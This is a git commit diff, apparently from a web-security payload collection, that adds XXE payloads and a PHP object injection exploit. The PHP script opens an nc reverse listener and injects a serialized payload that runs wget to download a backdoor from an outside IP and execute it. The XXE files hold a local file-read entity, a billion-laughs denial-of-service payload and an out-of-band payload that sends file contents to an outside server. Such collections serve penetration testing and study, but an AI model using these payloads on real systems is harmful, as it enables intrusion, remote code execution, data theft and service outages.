XXE payloads

2016-10-18 14:06:10 +07:00 · 2016-10-18 14:06:10 +07:00 · c097f222f4
parent c874dad3e9
commit c097f222f4
7 changed files with 114 additions and 8 deletions
--- a/PHP_Serialization/PHP-Serialization-RCE-Exploit.php
+++ b/PHP_Serialization/PHP-Serialization-RCE-Exploit.php
@ -0,0 +1,32 @@
+<?php 
+/*
+PHP Object Injection PoC Exploit by 1N3 @CrowdShield - https://crowdshield.com
+
+A simple PoC to exploit PHP Object Injections flaws and gain remote shell access. 
+
+Shouts to @jstnkndy @yappare for the assist!
+
+NOTE: This requires http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz setup on a remote host with a connect back IP configured
+*/
+
+print "==============================================================================\r\n";
+print "PHP Object Injection PoC Exploit by 1N3 @CrowdShield - https://crowdshield.com\r\n";
+print "==============================================================================\r\n";
+print "[+] Generating serialized payload...[OK]\r\n";
+print "[+] Launching reverse listener...[OK]\r\n";
+system('gnome-terminal -x sh -c \'nc -lvvp 4242\'');
+
+class PHPObjectInjection
+{
+   // CHANGE URL/FILENAME TO MATCH YOUR SETUP
+   public $inject = "system('wget http://92.222.81.2/backdoor.txt -O phpobjbackdoor.php && php phpobjbackdoor.php');";
+}
+
+$url = 'http://localhost/xvwa/vulnerabilities/php_object_injection/?r='; // CHANGE TO TARGET URL/PARAMETER
+$url = $url . urlencode(serialize(new PHPObjectInjection));
+print "[+] Sending exploit...[OK]\r\n";
+print "[+] Dropping down to interactive shell...[OK]\r\n";
+print "==============================================================================\r\n";
+$response = file_get_contents("$url");
+
+?>
--- a/README.md
+++ b/README.md
@ -1,4 +1,18 @@
-/!\ Work in Progress : 1%
-
 # PayloadsAllTheThings
 A list of every usefull payloads and bypass for Web Application Security
+
+TODO:
+* XSS
+* Upload
+* Traversal Directory
+* Tar
+* SSRF
+* PHP Serialization
+* CSV Injection
+
+To improve:
+* RCE
+* SQL injection
+* XXE
+
+# /!\ Work in Progress : 1%
--- a/Encoded.xml
+++ b/Encoded.xml
@ -0,0 +1 @@
+<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,PCFF...Cg=="> %init; ]><foo/>
--- a/XXE/Classic
+++ b/XXE/Classic
@ -0,0 +1,6 @@
+<?xml version="1.0"?>
+<!DOCTYPE data [
+<!ELEMENT data (#ANY)>
+<!ENTITY file SYSTEM "file:///sys/power/image_size">
+]>
+<data>&file;</data>
--- a/XXE/Deny
+++ b/XXE/Deny
@ -0,0 +1,8 @@
+<!DOCTYPE data [
+<!ENTITY a0 "dos" >
+<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
+<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
+<!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
+<!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">
+]>
+<data>&a4;</data>
--- a/XXE/README.md
+++ b/XXE/README.md
@ -1,12 +1,48 @@
-# Title
-Lorem	
+# XML External Entity
+An XML External Entity attack is a type of attack against an application that parses XML input	

-## Vuln
+## Exploit

+Classic XXE
 ```
-Code
+<?xml version="1.0"?>
+<!DOCTYPE data [
+<!ELEMENT data (#ANY)>
+<!ENTITY file SYSTEM "file:///sys/power/image_size">
+]>
+<data>&file;</data>
 ```

+Classic XXE Base64 encoded
+```
+<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,PCFF...Cg=="> %init; ]><foo/>
+```
+
+Deny Of Service - Billion Laugh Attack
+```
+<!DOCTYPE data [
+<!ENTITY a0 "dos" >
+<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
+<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
+<!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
+<!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">
+]>
+<data>&a4;</data>
+```
+
+
+XXE OOB Attack (Yunusov, 2013)
+```
+<?xml version="1.0" encoding="utf-8"?>
+<!DOCTYPE data SYSTEM "http://publicServer.com/parameterEntity_oob.dtd">
+<data>&send;</data>
+
+File stored on http://publicServer.com/parameterEntity_oob.dtd
+<!ENTITY % file SYSTEM "file:///sys/power/image_size">
+<!ENTITY % all "<!ENTITY send SYSTEM 'http://publicServer.com/?%file;'>">
+%all;
+```
+
+
 ## Thanks to
-* Lorem
-* Ipsum
+* https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
--- a/2013).xml
+++ b/2013).xml
@ -0,0 +1,9 @@
+XXE OOB Attack (Yunusov, 2013)
+<?xml version="1.0" encoding="utf-8"?>
+<!DOCTYPE data SYSTEM "http://publicServer.com/parameterEntity_oob.dtd">
+<data>&send;</data>
+
+File stored on http://publicServer.com/parameterEntity_oob.dtd
+<!ENTITY % file SYSTEM "file:///sys/power/image_size">
+<!ENTITY % all "<!ENTITY send SYSTEM 'http://publicServer.com/?%file;'>">
+%all;
				`@ -0,0 +1 @@`
				`<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,PCFF...Cg=="> %init; ]><foo/>`